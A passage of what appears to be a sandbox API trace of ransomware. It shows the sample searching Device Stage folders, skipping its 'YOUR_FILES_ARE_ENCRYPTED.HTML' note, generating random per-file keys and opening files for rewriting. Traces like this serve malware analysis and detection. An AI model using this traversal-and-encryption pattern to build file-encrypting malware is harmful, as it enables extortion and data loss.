ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae64995a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.883] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Device", cAlternateFileName="")) returned 1 [0109.883] StrStrIW (lpFirst="Device", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.883] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 52 [0109.883] GetProcessHeap () returned 0x600000 [0109.883] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.884] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0109.884] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*" [0109.884] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5d6c9c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.884] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5d6c9c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="..", cAlternateFileName="")) returned 1 [0109.884] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5d45a2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5d45a2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5dbade, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.884] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0109.884] StrStrIW (lpFirst="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.884] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 91 [0109.884] GetProcessHeap () returned 0x600000 [0109.884] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.885] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0109.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0109.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5b70c7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.885] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5b70c7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.885] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="background.png", cAlternateFileName="")) returned 1 [0109.885] StrStrIW (lpFirst="background.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.885] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 106 [0109.885] PathFindExtensionW (pszPath="background.png") returned=".png" [0109.885] lstrlenW (lpString=".png") returned 4 [0109.885] PathFindExtensionW (pszPath="background.png") returned=".png" [0109.885] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.886] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0109.886] StrStrIW (lpFirst="behavior.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.886] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 104 [0109.886] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0109.886] lstrlenW (lpString=".xml") returned 4 [0109.886] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0109.886] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.886] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="device.png", cAlternateFileName="")) returned 1 [0109.886] StrStrIW (lpFirst="device.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.886] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 102 [0109.886] PathFindExtensionW (pszPath="device.png") returned=".png" [0109.886] lstrlenW (lpString=".png") returned 4 [0109.886] PathFindExtensionW (pszPath="device.png") returned=".png" [0109.886] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.886] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0109.886] StrStrIW (lpFirst="overlay.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.886] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 103 [0109.886] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0109.886] lstrlenW (lpString=".png") returned 4 [0109.886] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0109.886] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.887] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0109.888] StrStrIW (lpFirst="superbar.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.888] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 104 [0109.888] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0109.888] lstrlenW (lpString=".png") returned 4 [0109.888] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0109.888] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.888] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5b70c7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5b70c7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5bbedf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.888] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5b70c7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5b70c7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5bbedf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.888] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.888] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.888] GetProcessHeap () returned 0x600000 [0109.888] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.889] GetProcessHeap () returned 0x600000 [0109.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.889] GetProcessHeap () returned 0x600000 [0109.889] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.889] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c204, dwReserved1=0x63c1a8, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0109.889] StrStrIW (lpFirst="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.889] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 91 [0109.889] GetProcessHeap () returned 0x600000 [0109.889] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.890] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0109.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0109.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5c95e3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0109.891] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae5c95e3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.891] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="background.png", cAlternateFileName="")) returned 1 [0109.891] StrStrIW (lpFirst="background.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.891] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 106 [0109.891] PathFindExtensionW (pszPath="background.png") returned=".png" [0109.891] lstrlenW (lpString=".png") returned 4 [0109.891] PathFindExtensionW (pszPath="background.png") returned=".png" [0109.891] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.891] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0109.891] StrStrIW (lpFirst="behavior.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.891] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 104 [0109.891] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0109.891] lstrlenW (lpString=".xml") returned 4 [0109.891] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0109.891] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.892] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0109.892] StrStrIW (lpFirst="watermark.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.892] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 105 [0109.892] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0109.892] lstrlenW (lpString=".png") returned 4 [0109.892] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0109.892] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0109.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.892] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5c6e87, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae5c6e87, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5cf7b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f588, dwReserved1=0x63c1b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.892] FindNextFileW 